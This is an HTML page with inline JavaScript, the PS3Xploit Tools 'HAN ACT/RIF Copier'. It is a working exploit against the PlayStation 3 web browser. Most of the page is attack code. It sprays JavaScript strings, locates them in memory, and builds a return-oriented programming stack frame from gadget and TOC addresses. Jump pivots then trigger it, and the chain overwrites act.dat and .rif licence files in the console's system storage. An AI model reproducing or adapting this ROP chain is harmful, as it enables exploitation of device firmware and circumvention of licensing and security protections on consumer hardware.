<!DOCTYPE html>
<html>
<head>
<script src="ps3xploit_v305.js"></script>
<meta charset="UTF-8"> 
<title>PS3Xploit Tools v3.0.5 - PS3 HAN ACT/RIF Copier</title>
<script>
function initROP(init)
{
	try
	{
		if(getRifValue().length!==0x28){alert('Invalid RIF Filename!');return;}
		if(init===true){frame_fails=0;search_base_off=0;search_size_ext=0;}
		if(t_out!==0){clearTimeout(t_out);t_out=0;}
		offset_array=[];
		disable_all();
		clearLogEntry();
		store_idx_arr1=new Array(2);
		store_idx_arr2=new Array(2);
		xtra_data_addr=0;
		stack_frame_addr=0;
		jump_2_addr=0;
		jump_1_addr=0;
		var act_addr=0,uid_addr=0,tmp_path=0,act_fpath_addr=0,null_addr=0,fd1_addr=0,fd2_addr=0,stat_addr=0,read_len_addr=0,written_len_addr=0,read_len2_addr=0,written_len2_addr=0,jmp_addr=0,jmp2_addr=0,rif_addr=0;
		var actdat_buf_addr=0x8B000000;
		var rif_buf_addr=0x8B200000;
		var search_max_threshold=70*0x100000; // 70Mb maximum memory search
		var search_base=0x80180000;//0x80190000;//
		var search_size=2*mbytes;
		search_base_off=1*mbytes/2;
		search_size_ext=1*mbytes/2;
		total_loops++;
		
		xtra_data=getactPath().convert()
		+fill_by_8bytes(rif_name_len,dbyte00)
		+actdat.convert()
		+userid.convert()
		+getRifValue().convert()
		+hexw2bin(0)
		+hexw2bin(gadget10_addr)
		+hexw2bin(toc_addr)
		+hexw2bin(gadget_mod2_addr)
		+hexw2bin(toc_addr)
		+fill_by_16bytes(0x100,dbyte00)
		+unescape("\uFD7E");
		while(xtra_data_addr===0)
		{
			if(search_max_threshold<search_size){load_check();return;}
			xtra_data=xtra_data.replaceAt(0,hexh2bin(0x7EFD));
			xtra_data_addr=findJsVariableOffset("xtra_data",xtra_data,search_base,search_size);
			search_max_threshold-=search_size;
		}
		
		act_addr=xtra_data_addr+getactPath().convertedSize()-0x4+rif_name_len;
		uid_addr=act_addr+actdat.convertedSize();
		rif_addr=uid_addr+userid.convertedSize();
		jmp_addr=rif_addr+getRifValue().convertedSize();
		jmp2_addr=jmp_addr+word_size*3;
		read_len_addr=jmp2_addr+dword_size;
		written_len_addr=read_len_addr+dword_size;
		store_idx_arr1[0]=(written_len_addr-xtra_data_addr+0x8)/2;
		read_len2_addr=written_len_addr+dword_size;
		written_len2_addr=read_len2_addr+dword_size;
		store_idx_arr1[1]=(written_len2_addr-xtra_data_addr+0x8)/2;
		null_addr=written_len2_addr+dword_size;
		fd1_addr=null_addr+dword_size;
		fd2_addr=fd1_addr+word_size;
		tmp_path=fd2_addr+word_size;
		act_fpath_addr=tmp_path+0x18;
		stat_addr=act_fpath_addr+0x68;
		store_idx_arr2[0]=(stat_addr-xtra_data_addr-0x4)/2;
		store_idx_arr2[1]=(stat_addr-xtra_data_addr)/2;
		//############################ Building stack frame ###############################################################
		stack_frame=stack_frame_hookup()
		+store_word(jmp_addr,jmp_addr+0x4,toc_entry4_addr)
		+store_word(tmp_path,act_addr)
		+getlastUserId(tmp_path,act_addr,uid_addr,act_fpath_addr,jmp_addr,jmp2_addr)
		+copy_file_overwrite(xtra_data_addr,act_fpath_addr,fd1_addr,fd2_addr,actdat_buf_addr,read_len_addr,written_len_addr,stat_addr,null_addr,stat_addr-0x8)
		+memcpy(xtra_data_addr+0xC,rif_addr,rif_name_len)
		+memcpy(act_fpath_addr+0x1F,rif_addr,rif_name_len)
		+store_word(fd1_addr,0)
		+store_word(fd2_addr,0)
		+copy_file_overwrite(xtra_data_addr,act_fpath_addr,fd1_addr,fd2_addr,rif_buf_addr,read_len2_addr,written_len2_addr,stat_addr,null_addr,stat_addr-0x4)
		//graceful exit
		+stack_frame_exit();
//############################ End stack frame ###############################################################		
		while(stack_frame_addr===0)
		{
			if(search_max_threshold<search_size+search_size_ext){frame_fails++;if((frame_fails%10)===0){search_base_off+=0;search_size_ext+=0;}load_check();return;}
			stack_frame=stack_frame.replaceAt(0,hexh2bin(0x2A2F));
			stack_frame_addr=findJsVariableOffset("stack_frame",stack_frame,search_base+search_base_off,search_size+search_size_ext);
			if(stack_frame_addr==-1)if(search_max_threshold<search_size+search_size_ext){frame_fails++;load_check();return;}
			search_max_threshold-=search_size+search_size_ext;
		}
		jump_2=unescape("\u0102\u7EFB")+fill_by_16bytes(0x30,0x8282)+hexw2bin(stack_frame_addr)+unescape("\uFB7E");		
		while(jump_2_addr===0)
		{
			if(search_max_threshold<search_size){load_check();return;}
			jump_2=jump_2.replaceAt(0,hexh2bin(0x7EFB));
			jump_2_addr=findJsVariableOffset("jump_2",jump_2,search_base,search_size);
			if(jump_2_addr==-1)if(search_max_threshold<search_size){load_check();return;}
			search_max_threshold-=search_size;
		}
		jump_1=unescape("\u4141\u7EFA")+hexw2bin(jump_2_addr)+unescape("\uFA7E");
		while(jump_1_addr===0)
		{
			if(search_max_threshold<search_size){load_check();return;}
			jump_1=jump_1.replaceAt(0,hexh2bin(0x7EFA));
			jump_1_addr=findJsVariableOffset("jump_1",jump_1,search_base,search_size);
			if(jump_1_addr==-1)if(search_max_threshold<search_size){load_check();return;}
			search_max_threshold-=search_size;
		}
		var sf=checkMemory(stack_frame_addr-0x4,0x8000,stack_frame.length);
		var x=checkMemory(xtra_data_addr-0x4,0x1000,xtra_data.length);
		var j2=checkMemory(jump_2_addr-0x4,0x800,jump_2.length);
		var j1=checkMemory(jump_1_addr-0x4,0x800,jump_1.length);
		if((j2===jump_2)&&(j1===jump_1)&&(x===xtra_data)&&(sf===stack_frame))
		{
			if(t_out!==0){clearTimeout(t_out);}
			showResult(hr+"<h1><b><font color=%22386E38%22>HAN Copier initialized successfully.</font></b></h1><h3><b><span style='color:#000000;'>You can now proceed to copy the file.</span></b></h3>");
			enable_trigger();
		}
		else
		{
			if(x!==xtra_data)logAdd("xtra_data mismatch in memory!");
			if(sf!==stack_frame)logAdd("stack_frame mismatch in memory!");
			if(j2!==jump_2)logAdd("jump_2 mismatch in memory!");
			if(j1!==jump_1)logAdd("jump_1 mismatch in memory!");
			//logAdd("String mismatch in memory!");
			load_check();
		}
	}
	catch(e)
	{
		debug=true;
		logAdd(br+"HAN Copier initialization failed because the following exception was thrown during execution:"+br+e+" at : "+e.lineNumber);
		debug=false;
	}
}

function triggerX()
{
		clearLogEntry();
		showResult(hr+"<h2><b><span style='color:#000000;'>Copying files...</span></b></h2>");
		disable_all();
		setTimeout(trigger,1000,jump_1_addr);
		setTimeout(rop_exit_2val,2000,hr+"<h1><b><font color=%22386E38%22>HAN Copier</font></b></h1><h2><b><span style='color:#000000;'>Files were successfully copied!</span></b></h2>",hr+"<h1><b><font color='red'>HAN Copier failed!</font></b></h1><h3><b><span style='color:#000000;'>Error copying file(s):</span></b></h3>","<h3><b><span style='color:#000000;'>"+getactPath().substr(4,0xC)+act+"</span></b></h3>","<h3><b><span style='color:#000000;'>"+getactPath().substr(4,0xC)+getRifValue()+"</span></b></h3>");
		cleanGUI();
}
</script>
</head>
	<body id="bodyId" style="background-color:#FFD097">
	<div id="headerId" style="color:#CC2010">
	<h1>PS3Xploit Tools v3.0.5 - PS3 HAN ACT/RIF Copier</h1>
	<h2><span style="color:#000000">Courtesy of PS3Xploit Team</span></h2><b>esc0rtd3w </b><span style="color:#000000;"> (Debugging & Testing) <b>|</b> </span><b>habib </b><span style="color:#000000"> (Reverse Engineering & Debugging) <b>|</b> </span><b>bguerville </b><span style="color:#000000"> (ROP, Javascript & Debugging)</span><hr>
	<span style="color:#000000">Many thanks to xerpi for porting the memory leak exploit to ps3, zecoxao & Joonie for their early & renewed support, mysis for documenting vsh/lv2, SSL for his regular & precious advice, kakaroto for the PS3 IDA tools, naherwert for scetool, Rebug Team for producing/updating the only CFW adequate to develop this work & Cobra team for sharing their CobraUSB source, the psdevwiki team of course, STLcardsWS for his long standing contribution & ever constant support.<br>We also wish to thank all the ps3 community hackers/devs, past & present, who directly or indirectly helped us put this project together, you know who you are...</span><hr>
	<h3>Supports CEX/DEX 4.81 - 4.82 OFW/CFW Firmware</h3>
	<h3>Supports DEX 4.84 OFW/CFW Firmware</h3>
	<h3>Supports CEX 4.84 - 4.88 HFW Firmware</h3>
	<p><span style="color:#000000">More details & news on</span> <a href="http://www.psx-place.com/forums/ps3xploit">http://www.psx-place.com</a><br><br><span style="color:#000000">PS3Xploit Team Donations:</span> <a href="https://www.paypal.me/nopsn">https://www.paypal.me/nopsn</a></p>
	<hr></div>
	<p><span style="color:#000000">USB Root Path </span><select id="comboactPath" name="actPath" size="1" onChange="selectfilePath()">
	<option id="path_0" selected="selected" value="xxxx/dev_usb000/act.dat">/dev_usb000</option><option id="path_1" value="xxxx/dev_usb001/act.dat">/dev_usb001</option><option id="path_2" value="xxxx/dev_usb006/act.dat">/dev_usb006</option>
	</select> | RIF File Name <input type="text" name="rif_file" id="txtrif" size="40" value="XXXXXX-XXXXXXXXX_XX-XXXXXXXXXXXXXXXX.rif"> | Auto-Close Browser <input type="checkbox" id="auto_close" name="aclose" checked="checked" onclick="autoclose();"/><span id="dex_txt" style="visibility:hidden"> | DEX mode<input type="checkbox" id="dex" name="DEX" disabled="" onclick="dex();"/></span></p>
	<p><button id="btnROP" type="button" onclick="initROP(true);" autofocus>Initialize ACT/RIF Copier</button> | <button id="btnTrigger" disabled="" type="button" onclick="triggerX();">Copy Files</button><span id="reset" style="visibility:hidden"> | <button id="btnReset" type="button" onclick="disable_trigger();">Reset</button></span></p>
	<div id="result" style="color:#CC2010"></div><br>
	<div id="log"></div>
	<div id="exploit" ></div>
	<div id="trigger"></div>
	<div id="footer"></div>
	<script>
		writeEnvInfo();
		ps3chk();
	</script>
	</body>
</html>